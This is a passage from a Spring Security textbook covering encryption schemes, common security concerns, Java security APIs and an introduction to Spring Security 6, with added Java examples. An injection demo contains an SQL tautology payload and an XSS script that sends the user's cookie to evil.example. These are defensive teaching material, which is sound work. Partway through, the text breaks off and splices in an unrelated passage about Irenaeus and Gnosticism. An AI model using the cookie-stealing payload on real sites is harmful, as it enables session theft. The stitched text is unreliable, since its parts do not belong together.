• Speed: Symmetric encryption algorithms are generally faster and more efficient than asymmetric encryption algorithms.

• Use case: Symmetric encryption is commonly used for securing large amounts of data, such as file encryption or secure communication between two parties who already share a secret key.

Figure 1-5 shows symmetric encryption at work.

Figure 1-5. Symmetric encryption: the two endpoints share the same encryption/
decryption key

• Public key cryptography: These techniques are based on asymmetric cryptography. In this scheme, a different key is used for encryption than for decryption. These two keys are referred to as the public key, which is used to encrypt messages, and the private key, which is used to decrypt messages. The advantage of this approach over symmetric encryption is that there is no need to share the decryption key, so no one but the intended receiver of the information can decrypt the message. The following describes a normal scenario.

• The intended recipient of messages shares her public key with everyone interested in sending information to her.

• A sender encrypts the information with the receiver’s public key and sends a message.


• The receiver uses her private key to decrypt the message.

• No one else can decrypt the message because they don’t have the
receiver’s private key.

The following summarizes the key handling, usage, and security properties of asymmetric (public-key) encryption.

• Key: Asymmetric encryption uses a pair of keys, a public key and a private key. The public key is freely available to anyone, while the owner keeps the private key secret.

• Encryption and decryption: The public key is used for encryption, while the private key is used for decryption. This means the data encrypted with the public key can only be decrypted with the corresponding private key.

• Security: Asymmetric encryption solves the key distribution problem because the private key is never shared or transmitted. It is, however, much slower than symmetric encryption and limited to small messages, which is why it is normally combined with a symmetric cipher (see hybrid encryption below).

• Use case: Asymmetric encryption is commonly used for secure key exchange, digital signatures, and secure communication between parties who don’t have a pre-shared secret key.

Figure 1-6 shows the public key cryptography scheme.

Figure 1-6. Public key cryptography

The use of encryption achieves, among other things, two other security goals.
• Confidentiality: Potentially sensitive information belonging to one
user or group of users should be accessible only to this user or group.
Encryption algorithms are the main helpers in achieving this goal.


• Integrity: Data sent by a valid user shouldn’t be altered by a third entity on its way to the server or in its storage. A plain hash alone does not guarantee this, because an attacker who changes the message can simply recompute the hash. Integrity is normally accomplished with a keyed hash (a message authentication code such as HMAC), a digital signature, or an authenticated encryption mode such as AES-GCM, so that an attacker cannot alter the input and produce a forged message whose tag still verifies (thus deceiving the receiver into thinking it is valid).

In practice, a combination of symmetric and asymmetric encryption is often used in hybrid encryption. In hybrid encryption, symmetric encryption encrypts the actual data, while the symmetric key is encrypted using the recipient’s public key (asymmetric encryption). This approach combines the efficiency of symmetric encryption with the security and flexibility of asymmetric encryption.
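The symmetric (Figure 1-5), public-key (Figure 1-6), and hybrid schemes above, as one added Java example written for this edit (not code from the book): AES-GCM encrypts the message under a fresh data key, RSA-OAEP wraps that key with the recipient’s public key, and only the private key holder can unwrap and decrypt. The GCM authentication tag also provides the integrity goal discussed above; the tampering check at the end shows it. The Envelope record and the method names are assumptions made for the example.

```java
import java.nio.charset.StandardCharsets;
import java.security.GeneralSecurityException;
import java.security.Key;
import java.security.KeyPair;
import java.security.KeyPairGenerator;
import java.security.PrivateKey;
import java.security.PublicKey;
import java.security.SecureRandom;
import java.util.Arrays;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.SecretKey;
import javax.crypto.spec.GCMParameterSpec;

// Added example of the symmetric, public-key and hybrid schemes using the JDK's
// JCE classes (AES-GCM for the data, RSA-OAEP to wrap the AES key).
// Envelope and the method names are invented for this illustration.
public class HybridEncryption {

    private static final int GCM_IV_BYTES = 12;   // 96-bit nonce, the size GCM is designed for
    private static final int GCM_TAG_BITS = 128;  // authentication tag: integrity comes for free
    private static final SecureRandom RANDOM = new SecureRandom();

    // What travels over the wire: the wrapped data key, the nonce and the ciphertext.
    record Envelope(byte[] wrappedKey, byte[] iv, byte[] ciphertext) {}

    // Sender side: fresh AES key per message, encrypt the data symmetrically,
    // then encrypt (wrap) only that small key with the recipient's public key.
    static Envelope seal(byte[] plaintext, PublicKey recipient) throws GeneralSecurityException {
        KeyGenerator kg = KeyGenerator.getInstance("AES");
        kg.init(256);
        SecretKey dataKey = kg.generateKey();

        byte[] iv = new byte[GCM_IV_BYTES];
        RANDOM.nextBytes(iv);                    // never reuse an IV under the same key
        Cipher aes = Cipher.getInstance("AES/GCM/NoPadding");
        aes.init(Cipher.ENCRYPT_MODE, dataKey, new GCMParameterSpec(GCM_TAG_BITS, iv));
        byte[] ciphertext = aes.doFinal(plaintext);

        Cipher rsa = Cipher.getInstance("RSA/ECB/OAEPWithSHA-256AndMGF1Padding");
        rsa.init(Cipher.WRAP_MODE, recipient);
        byte[] wrappedKey = rsa.wrap(dataKey);
        return new Envelope(wrappedKey, iv, ciphertext);
    }

    // Receiver side: only the private key holder can unwrap the data key;
    // GCM then rejects the ciphertext if a single bit was changed in transit.
    static byte[] open(Envelope env, PrivateKey own) throws GeneralSecurityException {
        Cipher rsa = Cipher.getInstance("RSA/ECB/OAEPWithSHA-256AndMGF1Padding");
        rsa.init(Cipher.UNWRAP_MODE, own);
        Key dataKey = rsa.unwrap(env.wrappedKey(), "AES", Cipher.SECRET_KEY);

        Cipher aes = Cipher.getInstance("AES/GCM/NoPadding");
        aes.init(Cipher.DECRYPT_MODE, dataKey, new GCMParameterSpec(GCM_TAG_BITS, env.iv()));
        return aes.doFinal(env.ciphertext());
    }

    public static void main(String[] args) throws GeneralSecurityException {
        // The recipient publishes the public key; the private key never leaves her side.
        KeyPairGenerator kpg = KeyPairGenerator.getInstance("RSA");
        kpg.initialize(3072);
        KeyPair recipient = kpg.generateKeyPair();

        // Constructed sample message.
        byte[] message = "account balance: 1,250.00".getBytes(StandardCharsets.UTF_8);
        Envelope env = seal(message, recipient.getPublic());
        byte[] recovered = open(env, recipient.getPrivate());
        System.out.println("round trip ok: " + Arrays.equals(message, recovered));

        // Flip one ciphertext bit: the GCM tag check makes decryption throw.
        byte[] tampered = env.ciphertext().clone();
        tampered[0] ^= 0x01;
        try {
            open(new Envelope(env.wrappedKey(), env.iv(), tampered), recipient.getPrivate());
            System.out.println("tampering went unnoticed");
        } catch (GeneralSecurityException e) {
            System.out.println("tampering detected: " + e.getClass().getSimpleName());
        }
    }
}
```

The wrapped key is the only part of the envelope that depends on the recipient, so the same ciphertext can be sent to several recipients by wrapping the data key once per public key.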

What to Secure
Not every part of the application requires a strong security model or any security. If, for
example, one part of your application is supposed to serve static content to everyone
interested, you can simply serve this content. There probably are no security concerns to
handle here.
Anyway, when starting to work on a new application, you should think about the
security constraints that your application will have. You should think about concerns like
those in the following list and whether they apply to your particular use case.

• Identity management: Your application will likely need to establish the users’ identities. Usually, your application will do different things for different users, so you need a way to associate users with certain functionality. You also need to protect each user’s identity information so it can’t be compromised.

• Secured connections: In an Internet environment, where anyone in the world can potentially access your system and eavesdrop on other users accessing your system, you most likely want to secure the communication of sensitive data using transport layer security (TLS, the successor to SSL).


• Sensitive data protection: Sensitive data needs to be protected against malicious attacks. This applies to the communication layer, individual message transmission, and credentials data stores. Encryption should be used in different layers to achieve the most secure application possible.

Additional Security Concerns


There are many more security concerns than the ones explained so far. Because this
is a Spring Security book and not a general application-security book, it covers only
things related to Spring Security. However, we think it is important that you understand
that there are many more security concerns than those addressed directly by Spring
Security. The following is a quick overview of some of the most common ones. This is
only intended to make you aware of their existence, and we recommend you consult a
different source (such as a general software security textbook) to better understand all
these concerns.

• SQL (and other code) injection: Validating user input is vital to application security. If data is not validated, an attacker could write any string as input (including SQL or server-side code) and send that information to the server. If the server code builds queries or commands by concatenating that input, the attacker could wreak significant havoc, reading or altering arbitrary data or, in the worst case, executing arbitrary code on the server. The standard defense is to keep data out of the code path altogether: use parameterized queries (prepared statements) rather than string concatenation, and treat input validation as an additional layer, not the only one.

• Denial-of-service attacks: These attacks make the target system unresponsive to its intended users. This is normally done by saturating the server with requests to utilize all the server’s resources and make it unresponsive to legitimate requests.

• Cross-site scripting and output encoding: An injection can also be done where the target is the client part of the application. The idea is that the attacker can make an application return malicious script inside the web pages it renders and thus execute it in the victim’s browser. This way, the attacker invisibly executes actions using the real user’s authenticated session. The defense is to encode untrusted data for the context in which it is output (HTML body, attribute, JavaScript, or URL).


• Unauthorized access: This occurs when an individual or entity gains unauthorized entry to a system, network, or data. It can result in data breaches, theft of sensitive information, or unauthorized manipulation of systems.

• Malware and ransomware: Malware refers to malicious software designed to disrupt, damage, or gain unauthorized access to systems. Ransomware is a specific type of malware that encrypts data and demands a ransom for its release. Both malware and ransomware can lead to data loss, financial loss, and operational disruptions.

• Phishing and social engineering: Phishing involves fraudulent attempts to obtain sensitive information, such as passwords or financial details, by disguising it as a trustworthy entity via emails, phone calls, or websites. Social engineering exploits human vulnerabilities to manipulate individuals into revealing confidential information or performing actions that can compromise security.

• Data breaches: These breaches occur when unauthorized individuals access sensitive or confidential data, such as personal information, credit card details, or intellectual property. Data breaches can result in financial loss, reputational damage, and legal consequences.

• Insider threats: These threats involve individuals with authorized access to systems or information who misuse their privileges for malicious purposes. This can include intentional data theft, sabotage, or unauthorized disclosure of sensitive information.

• Weak authentication and password security: Weak or easily guessable passwords, inadequate authentication mechanisms, and insufficient password management practices can leave systems vulnerable to unauthorized access and compromise.

• Vulnerabilities and software exploits: Software vulnerabilities, such as unpatched or outdated systems, can be exploited by attackers to gain unauthorized access, inject malware, or manipulate systems. It is crucial to promptly apply security patches and updates to mitigate these risks.


• Cloud security: Organizations utilizing cloud services must address specific security concerns, including data privacy, data segregation, access control, and cloud provider vulnerabilities.

• IoT security: The proliferation of IoT devices introduces new security challenges, including insecure device configurations, lack of encryption, and vulnerabilities in IoT networks. Compromised IoT devices can be used to launch attacks or gain unauthorized access to networks.

Addressing these IT security concerns requires a comprehensive and multi-layered approach, including implementing strong security controls, regular security assessments, user education and awareness, incident response planning, and adherence to security best practices.
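For the two injection concerns in the list above (SQL injection and cross-site scripting), here is an added Java example written for this edit (not code from the book) that places the vulnerable pattern beside the hardened one: string-concatenated SQL versus a PreparedStatement with a bound parameter, and raw HTML output versus output encoding. The users table, the method names, and the attacker inputs are constructed for the example; the JDBC Connection for the hardened query is supplied by the caller, so the main method exercises only the parts that run without a database.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

// Added example contrasting injection-prone code with the parameterised and
// output-encoded forms. The users table, method names and sample payloads are
// invented for this illustration; userExists needs a Connection from the caller.
public class InjectionDemo {

    // VULNERABLE: the attacker-controlled value becomes part of the SQL text,
    // so a quote in the input changes the statement's structure.
    static String buildLoginQueryUnsafe(String username) {
        return "SELECT id FROM users WHERE username = '" + username + "'";
    }

    // HARDENED: the value is bound as a parameter. The driver sends it separately
    // from the statement text, so it can never alter the query's structure.
    static boolean userExists(Connection conn, String username) throws SQLException {
        String sql = "SELECT id FROM users WHERE username = ?";
        try (PreparedStatement ps = conn.prepareStatement(sql)) {
            ps.setString(1, username);
            try (ResultSet rs = ps.executeQuery()) {
                return rs.next();
            }
        }
    }

    // VULNERABLE: reflecting untrusted text straight into HTML lets the browser
    // interpret any markup or script it contains.
    static String greetingUnsafe(String name) {
        return "<p>Welcome, " + name + "</p>";
    }

    // HARDENED: encode the characters that are significant in an HTML body
    // before output, so the browser renders them as text.
    static String htmlEncode(String s) {
        StringBuilder out = new StringBuilder(s.length());
        for (char c : s.toCharArray()) {
            switch (c) {
                case '<'  -> out.append("&lt;");
                case '>'  -> out.append("&gt;");
                case '&'  -> out.append("&amp;");
                case '"'  -> out.append("&quot;");
                case '\'' -> out.append("&#x27;");
                default   -> out.append(c);
            }
        }
        return out.toString();
    }

    static String greetingSafe(String name) {
        return "<p>Welcome, " + htmlEncode(name) + "</p>";
    }

    public static void main(String[] args) {
        // Constructed attacker inputs: a tautology for the SQL case and a
        // cookie-stealing script for the XSS case.
        String sqlPayload = "' OR '1'='1";
        String xssPayload = "<script>document.location='https://evil.example/?c='+document.cookie</script>";

        // The unsafe query now ends in ... username = '' OR '1'='1', which matches every row.
        System.out.println(buildLoginQueryUnsafe(sqlPayload));
        // The unsafe greeting contains a live <script> element; the safe one contains only text.
        System.out.println(greetingUnsafe(xssPayload));
        System.out.println(greetingSafe(xssPayload));
    }
}
```

htmlEncode is correct only for HTML body content; a value placed inside a JavaScript block, a URL, or an unquoted attribute needs the encoding for that context, which is why template engines expose separate escaping functions per context.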

Java Options for Security


Java SE and Jakarta EE (formerly Java EE) out-of-the-box security solutions are very comprehensive. They cover areas ranging from a low-level permission system through cryptography APIs to an authentication and authorization scheme.
The list of security APIs offered in Java is very extensive, as the following list of the main ones shows.

• Java Cryptography Architecture (JCA) supports cryptographic algorithms, including hash-digest and digital signature support.

• Java Cryptographic Extensions (JCE) mainly provides facilities for the encryption and decryption of strings and secret key generation for symmetric algorithms.

• Java Certification Path API (CertPath) provides comprehensive functionality for integrating the validation and verification of digital certificates into an application.

• Java Secure Socket Extension (JSSE) provides a standardized set of features to support SSL and TLS protocols, both client and server, in Java.


• Java Authentication and Authorization Service (JAAS) provides a service for authentication and authorization in Java applications. It provides a pluggable system where authentication mechanisms can be plugged in independently to applications.

• Java Generic Security Services (Java GSS-API) securely exchanges messages between communicating applications. “Introduction to JAAS and Java GSS-API Tutorials” is a series of tutorials demonstrating various aspects of using JAAS and Java GSS-API.

The JDK is divided into modules. The following modules contain security APIs.

• java.base

• java.security.jgss

• java.security.sasl

• java.smartcardio

• java.xml.crypto

• jdk.jartool

• jdk.security.auth

• jdk.security.jgss

For the entire list of Java release 20 security APIs, please refer to https://docs.oracle.com/en/java/javase/20/security/security-api-specification1.html.
Figure 1-7 shows the Java platform security architecture and elements.


Figure 1-7. Java platform security architecture and elements

Spring Security’s main concerns are in the authentication/authorization realm. So, it overlaps mainly with the JAAS Java API, although they can be used together, as you will see later in the book. Most of the other APIs are leveraged in Spring Security. For example, CertPath is used in X509AuthenticationFilter, and JCE is used in the spring-security-crypto module.

Summary
This chapter introduced security from a general point of view down to defense-in-depth mechanisms. It explained in a very abstract way the main concerns in IT security, especially from an application point of view. It also briefly described the main Java APIs that support security at different levels.
You can see that this chapter was a very quick overview of security concerns. It is
beyond the scope of this book to go any further than this on general topics, although
some of them are studied in more depth when they apply to Spring Security. This is
nothing like a comprehensive software security guide, and if you are interested in
learning more about software security in general, you should consult the specialized
literature. The next chapter introduces Spring Security.

CHAPTER 2

Introducing Spring
Security
In this chapter, you learn what Spring Security is and how to use it to address security
concerns about your application.
We describe what’s new in Spring Framework and Spring Security version 6. Using
Spring Security 6 with authentication and authorization is discussed in detail.
Finally, you look at the framework’s source code, how to build it, and the different
modules forming the powerful Spring Security project.

What Is Spring Security?


Spring Security is a framework dedicated to providing a full array of security services to
Java applications in a developer-friendly and flexible way. It adheres to the well-
established practices introduced by the Spring Framework. Spring Security tries to
address all the layers of security inside your application. In addition, it comes packed
with an extensive array of configuration options that make it very flexible and powerful.
Recall from Chapter 1 that it can be said that Spring Security is simply a
comprehensive authentication/authorization framework built on top of the Spring
Framework. Although most applications that use the framework are web-based, Spring
Security’s core can also be used in stand-alone applications.
Many things make Spring Security immediately attractive to Java developers. To
name just a few, consider the following list.

• It’s built on top of the successful Spring Framework. This is an important strength of Spring Security. The Spring Framework has become “the way” to build enterprise Java applications, and with good reason. It is built around good practices and two simple yet powerful concepts: dependency injection (DI) and aspect-oriented programming (AOP). Also important is that many developers have experience with Spring, so they can leverage that experience when introducing Spring Security in their projects.

© Massimo Nardone, Carlo Scarioni 2024
M. Nardone and C. Scarioni, Pro Spring Security, https://doi.org/10.1007/979-8-8688-0035-1_2

• It provides out-of-the-box support for many authentication models. Even more
important than the previous point, Spring Security supports out-of-the-box integration
with Lightweight Directory Access Protocol (LDAP), OpenID, SAML 2.0, form
authentication, OAuth 2.0, X.509 certificate authentication, database authentication,
Jasypt cryptography, and lots more. All this support means that Spring Security adapts to
your security needs—and not only that, it can change if your needs change, without much
effort involved for the developer. More information on Jasypt cryptography is at
www.jasypt.org/.

This is also important from a business point of view because the application can either
adapt to the corporate authentication services or implement its own, thus requiring only
straightforward configuration changes.

This also means that there is a lot less software for you to write,
because you are using a great amount of ready-to-use code that has
been written and tested by a large and active user community. To
a certain point, you can trust that this code works and use it with
confidence. And if it does not work, you can always fix it and send a
patch to those in charge of maintaining the project.

• It offers layered security services. Spring Security allows you to secure your
application at different levels: your web URLs, views, service methods, and domain
model. You can pick and combine these features to achieve your security goals.

It is very flexible in practice. Imagine, for instance, that you offer services
exposed through RMI, the Web, JMS, and others. You could secure all
these interfaces, but maybe it’s better to secure just the business layer so
that all requests are secured when they reach this layer. Also, maybe you
don’t care about securing individual business objects, so you can omit
that module and use the functionality you need.

• It is open source software. As part of the Pivotal portfolio, Spring Security is an
open source software tool. It also has a large community and user base dedicated to
testing and improving the framework. Having the opportunity to work with open source
software is an attractive feature for most developers. The ability to look into the source
code of the tools you like and work with is an exciting prospect. Whether our goal is to
improve the tools or simply to understand how they work internally, we developers love
to read code and learn from it.

Where Does Spring Security Fit In?


Spring Security is without question a powerful and versatile tool. But like anything else, it
is not a tool that adapts to everything you want to do. Its offerings have a defined scope.
Where and why would you use Spring Security? The following lists reasons and
scenarios.

• You need to develop web security. Spring Security provides robust security features
for web applications, including protection against common web vulnerabilities, such as
cross-site scripting (XSS), cross-site request forgery (CSRF), and clickjacking.

• You need strong mechanisms for securing URLs. You want to restrict access to
specific resources and enforce secure communication over HTTPS.

• Your application is in Java, Groovy, or Kotlin. The first thing to take into account
is that applications using Spring Security can be written in Java, Groovy, Kotlin, or
generally any language supported by the JVM. So if you plan to work in a non-JVM
language, Spring Security won’t be useful.

• You need role-based authentication/authorization. This is the main use case of
Spring Security. You have a list of users and resources and operations on those
resources. You group the users into roles and allow certain roles to access certain
operations on certain resources. That’s the core functionality.


• You want to secure a web application from malicious users. Spring Security is
mostly used in web application environments. When this is the case, the first thing to do
is allow only the users you want to access your application, while forbidding all others
from even reaching it.

• You need to integrate with OpenID, LDAP, Active Directory, and databases as
security providers. If you need to integrate with a particular Users and Roles or Groups
provider, you should look at the vast array of options Spring Security offers because the
integration might already be implemented, saving you from writing lots of unnecessary
code. Sometimes you might not be exactly sure what provider your business requires to
authenticate against. In this case, Spring Security makes your life easy by allowing you to
switch between different providers painlessly.

• You need to secure your domain model and allow only certain users to access
certain objects in your application. If you need fine-grained security (that is, you need
to secure on a per-object, per-user basis), Spring Security offers the access control list
(ACL) module, which helps you do just that in a straightforward way.

• You want a nonintrusive, declarative way for adding security around your
application. Security is a cross-cutting concern, not a core business functionality of
your application (unless you work for a security provider firm). As such, it is better
treated as a separate and modular add-on that you can declare, configure, and manage
independently of your main business concerns. Spring Security is built with this in mind.
Using servlet filters, XML configuration, and AOP concepts, the framework tries not to
pollute your application with security rules. Even when using annotations, they are still
metadata on top of your code; they don’t mess with your code logic. As a Java developer,
you must try to isolate the Java configuration into a configuration library and decouple it
from the rest of the application, just as you would with XML.

• You want to secure your service layer the same way you secure your URLs, and
you need to add rules at the method level for allowing or disallowing user access.
Spring Security allows you to use a consistent security model throughout the layers of
your application because it internally enforces this consistent model itself. You configure
users, roles, and providers in just one place, and both the service and web layers use this
centralized security configuration transparently.

• You need your application to remember its users on their next visit and allow
them access. Sometimes you don’t want or need the users of your application to log in
every time they visit your site. Spring supports out-of-the-box remember-me functionality
so that a user can be automatically logged in on subsequent visits to your site, allowing
them full or partial access to their profile’s functionality.

• You want to use public/private key certificates to authenticate against your
application. Spring Security allows you to use X.509 certificates to verify the server’s
identity. The server can also request a valid certificate from the client for establishing
mutual authentication.

• You need to hide elements in your web pages from certain users
and show them to others. View security is the first layer of security in
a secured web application. It is normally not enough for guaranteeing
security. But it is very important from a usability point of view
because it allows the application to show or hide content depending
on the user currently logged in to the system.

• You need more flexibility than simple role-based authentication for your
application. For example, suppose that you want to allow access only to users over 18
years of age using simple script expressions. Spring Security 3.1 uses the Spring
Expression Language (SpEL) to allow you to customize access rules for your application.

• You want your application to automatically handle HTTP status codes related to
authorization errors (401, 403, and others). The built-in exception-handling
mechanism of Spring Security for web applications automatically translates the more
common exceptions to their corresponding HTTP status codes; for example,
AccessDeniedException gets translated to the 403 status code.

• You want to configure your application to be used from other applications (not
browsers) and allow these other applications to authenticate themselves against
yours. Another application accessing your application should be forced to use
authentication mechanisms to gain access. For example, you can expose your application
through REST endpoints that other applications can access with HTTP security.

• You are running an application outside a Java EE Server. If you run your
application in a simple web container like Apache Tomcat, you probably don’t have
support for the full Java EE security stack. Spring Security can be easily leveraged in
these environments.

• You are running an application inside a Java EE Server. Even if you are running a
full Java EE container, Spring Security is arguably more complete, flexible, and easy to
use than the Java EE counterpart.

• You are already using Spring in your application and want to leverage your
knowledge. You already know some of the great advantages of Spring. If you are
currently using Spring, you probably like it a lot. You will probably like Spring Security
as well.
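As an added example (not code from the book or from the Spring project), the following Spring Security 6 Java configuration puts several of the scenarios above together in a single @Configuration class: role-based URL rules, form login with remember-me, HTTPS enforcement, and a service-layer @PreAuthorize rule written in SpEL that reuses the same users and roles. The package name, the user accounts and passwords, and the remember-me key are constructed placeholders for the example.

```java
package com.example.demo.security; // hypothetical package for this added example

import org.springframework.context.annotation.Bean;
import org.springframework.context.annotation.Configuration;
import org.springframework.security.access.prepost.PreAuthorize;
import org.springframework.security.config.Customizer;
import org.springframework.security.config.annotation.method.configuration.EnableMethodSecurity;
import org.springframework.security.config.annotation.web.builders.HttpSecurity;
import org.springframework.security.config.annotation.web.configuration.EnableWebSecurity;
import org.springframework.security.core.userdetails.User;
import org.springframework.security.core.userdetails.UserDetailsService;
import org.springframework.security.crypto.bcrypt.BCryptPasswordEncoder;
import org.springframework.security.crypto.password.PasswordEncoder;
import org.springframework.security.provisioning.InMemoryUserDetailsManager;
import org.springframework.security.web.SecurityFilterChain;
import org.springframework.stereotype.Service;

@Configuration
@EnableWebSecurity
@EnableMethodSecurity // enables @PreAuthorize on service-layer methods
public class DemoSecurityConfig {

    @Bean
    SecurityFilterChain filterChain(HttpSecurity http) throws Exception {
        http
            // URL layer: role-based rules, most specific first; everything else needs a login.
            .authorizeHttpRequests(auth -> auth
                .requestMatchers("/", "/login", "/css/**").permitAll()
                .requestMatchers("/admin/**").hasRole("ADMIN")
                .requestMatchers("/accounts/**").hasAnyRole("USER", "ADMIN")
                .anyRequest().authenticated())
            // Form login; CSRF protection and the clickjacking/XSS headers keep their defaults.
            .formLogin(Customizer.withDefaults())
            // Remember-me cookie so a returning user is logged in again on the next visit.
            // The key signs the cookie; a real deployment uses a secret, not this placeholder.
            .rememberMe(rm -> rm.key("demo-remember-me-key-CHANGE-ME").tokenValiditySeconds(86_400))
            // Insist on HTTPS for every request.
            .requiresChannel(ch -> ch.anyRequest().requiresSecure());
        // Nothing extra is needed for status codes: an AccessDeniedException from a rule
        // below becomes a 403, and an unauthenticated request is sent to the login page.
        return http.build();
    }

    @Bean
    PasswordEncoder passwordEncoder() {
        return new BCryptPasswordEncoder();
    }

    @Bean
    UserDetailsService users(PasswordEncoder encoder) {
        // Constructed demo accounts; a real deployment would point this at an LDAP,
        // database or other provider instead of an in-memory store.
        return new InMemoryUserDetailsManager(
            User.withUsername("alice").password(encoder.encode("alice-pw")).roles("USER").build(),
            User.withUsername("bob").password(encoder.encode("bob-pw")).roles("ADMIN").build());
    }
}

@Service
class AccountService {
    // Service-layer rule evaluated against the same users and roles as the URL rules.
    // '#age' refers to the method argument; the SpEL expression refuses callers under 18
    // unless they hold ROLE_ADMIN, so the rule holds even if a URL rule is bypassed.
    @PreAuthorize("hasRole('ADMIN') or (hasRole('USER') and #age >= 18)")
    public String openAccount(String owner, int age) {
        return "account opened for " + owner;
    }
}
```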

Spring Security Overview

Spring Security 6 is part of the Spring portfolio, which includes the following projects.

• Spring Security

• Spring Boot 3.0

• Spring Framework

• Spring Cloud Data Flow

• Spring Cloud

• Spring Data

• Spring Integration

• Spring Authorization Server

• Spring for GraphQL

• Spring Batch

• Spring HATEOAS

• Spring REST Docs

• Spring AMQP

• Spring Mobile

• Spring for Android

• Spring Web Flow

• Spring Web Services

• Spring LDAP

• Spring Session

• Spring Shell

• Spring Flo

• Spring Kafka

• Spring Statemachine

• Spring IO Platform

• Spring Roo

• Spring Scala

• Spring BlazeDS Integration

• Spring Loaded

• Spring XD

• Spring Social

For more information, please refer to the Spring project web page at https://
spring.io/projects.
Each of these projects is built on top of the facilities provided by the Spring
Framework itself, which is the original project that started it all. Think of Spring as the
hub of all these satellite projects, providing them with a consistent programming model
and a set of established practices. The main points you see throughout the different
projects are the use of DI, XML namespace-based configuration, and AOP, which, as you
see in the next section, are the pillars upon which Spring is built. In later versions of
Spring, annotations have become the most popular way to configure both DI and AOP
concerns.
This book introduces Spring Boot, analyzes Spring Framework, and develops Spring
Security version 6. Let’s start with Spring Boot.

What Is Spring Boot?


Spring Boot is an open source Java-based framework generally used for developing
microservice-based, enterprise-ready applications. Pivotal developed it to help developers
create stand-alone and production-ready Spring applications.
Spring Boot is an easy starting point for building all Spring-based applications and
running them as quickly as possible, with minimal upfront configuration of Spring.
When this book was written, Spring Boot 3.0 was the latest release (November 2022); it
requires Java 17+ and Jakarta EE 9.

Note Remember that a Spring Security application can be developed with Maven
or Gradle.

Spring Security is one of the Spring projects; it is dedicated exclusively to addressing
security concerns in applications.
For more information, please refer to the documentation at https://spring.io/
projects/spring-security.
Spring Security began as a non-Spring project. It was originally known as the
“Acegi Security System for Spring” and was not the big and powerful framework it is
today. Originally, it dealt only with authorization and leveraged container-provided
authentication. Because of public demand, the project started gaining traction, as more
people started using it and contributing to its continuously growing code base. This
eventually led to it becoming a Spring Framework portfolio project, and then later it was
rebranded as Spring Security.


The following lists Spring Security’s major release dates.

• 2.0.0 (April 2008)

• 3.0.0 (December 2009)

• 4.0.0 (March 2015)

• 5.0.0 (November 2017)

• 5.1.4 (February 2019)

• 6.1.0 (May 2023)

Java configuration for Spring Security was added to the Spring Framework in Spring
3.1 and extended to Spring Security in Spring 3.2 and is defined in a class annotated
@Configuration.
Spring Security 6 requires JDK 17 and uses the Jakarta namespace.
The project for many years now has been under the Pivotal umbrella of projects,
powered by the Spring Framework itself. But what exactly is the Spring Framework?

Spring Framework 6: A Quick Overview


We have mentioned the Spring Framework project a lot. It makes sense to give an
overview of it at this point, because many of the Spring Security characteristics we cover
in the rest of the book rely on the building blocks of Spring.
We admit we’re biased. We love Spring and have loved it for many years now. We
think Spring has so many advantages and great features that we can’t start a new Java
project without using it. Additionally, we tend to carry its concepts around when working
with other languages and look for a way to apply them because they now feel natural.
Spring Framework 5 was published in September 2017 and can be considered the
first major Spring Framework release since version 4 was released in December 2013.
The latest Spring Framework release when this manuscript was written was version 6.0.9
(May 2023).
Next, let’s briefly review the most important new features in Spring Framework 6.


JDK 17+ and Jakarta EE 9+ Baseline

• Entire framework based on Java 17 source code level

• Migration from javax to jakarta namespace for Jakarta Servlet, JPA, and so on

• Runtime compatibility with Jakarta EE 9 and Jakarta EE 10 APIs

• Compatible with latest web servers—Tomcat 10.1, Jetty 11, Undertow 2.3

• Early compatibility with virtual threads (in preview as of JDK 19)

General Core Revision

• Upgrade to ASM 9.4 and Kotlin 1.7

• Complete CGLIB fork with support for capturing CGLIB-generated classes

• Comprehensive foundation for ahead-of-time transformations

• First-class support for GraalVM native images

Core Container

• First-class configuration options for virtual threads on JDK 21

• Lifecycle integration with Project CRaC for JVM checkpoint restore

• Support for resolving SequencedCollection/Set/Map at injection points

• Support for registering a MethodHandle as a SpEL function

• Validator factory methods for programmatic validator implementations

30
Other documents randomly have
different content
author of the old and new covenants, and the judge of all
mankind77. He does not carry on his argument with much regularity,
and it would be difficult to give any useful analysis of it. But he
discusses, towards the end, in chapters thirty-seven, thirty-eight,
and thirty-nine, the great question of the accountability of man, and
the freedom of the will.

In the preface to the fifth book78, he announces his intention of


carrying on the argument by quotations from the writings of the
apostle Paul, to show that the same God who had spoken to
Abraham and given the law had in the latter days sent his Son to
give salvation to human flesh; which he pursues in [pg 039] the first
eighteen chapters, dwelling particularly on the doctrine of the
resurrection of the flesh (chap. 7-14), and corroborating S. Paul's
doctrine from other parts of Scripture. He is thence led to the object
and end of the scheme of salvation by Christ, and the opposition to
it by Satan (chap. 19-24), especially the great opposition to it
through the agency of antichrist (chap. 24-30), and passes from the
notice of the state of departed souls (chap. 31) to exhibit and
confirm his opinion of the terrestrial reign of Christ and the righteous
(chap. 32-35), concluding with the consummation of all things in the
eternal felicity of the just.

It will be seen by this slight sketch that the former part of the
treatise is by far the most regular; and for this sufficient reason, that
it was more completely studied and digested before it was written.
In the latter books, he adheres but imperfectly to the intention
announced in the preface, and introduces much matter which was
evidently suggested casually as he was writing, by some word or
expression he found himself using.

The work, as I have said, was written in Greek; but the greater
portion of the original has been lost. What remains has been
preserved by various authors in the form of quotations. In this way
two-thirds of [pg 040] the first book have come down to us; a few
detached fragments in the latter half of the second; considerably
larger and more numerous portions of the third; very little of the
fourth, but copious extracts from the fifth, especially near the
beginning. The whole, however, existed in the ninth century, as we
learn from the testimony of Photius79. But, although we have lost the
greater part of the original, an ancient Latin translation of the whole
work has been preserved to us. The precise antiquity of this version
we are unable to ascertain; but the closeness with which Tertullian
appears to follow it in many passages80, and in particular his making
the very same [pg 041] mistakes as the interpreter, (as for instance,
in regard to the name of the heretic Epiphanes, which they [pg 042]
have both rendered by an epithet, and others instanced by
Massuet,) almost amounts to a demonstration [pg 043] that he had
read that version. That it existed in the time of S. Augustin, is
certain, as he quotes it at least twice, almost word for word81.

The effect of this great work appears to have been decisive, for we
hear no more of any eminent person who held the Gnostic opinions.
They prevailed to a certain degree for the greater part of another
century, but they did not make head again. The name, indeed,
continued to have so great a charm, that Clement of Alexandria took
it from the heretics, and applied it to an intelligent Christian, whom
he depicts as the only true Gnostic. But the system, as a whole,
became so entirely extinct that scarce a trace of its influence
remains, except in the writings of those who had to combat it.

[pg 044]
In his opposition to the Gnostics, Irenæus had to combat a heresy;
the next circumstance which brought him forward was, a schism
which threatened to separate a portion of the Christian world from
the communion of its most influential Church. There had been a
variation in very early times, and indeed from the beginning,
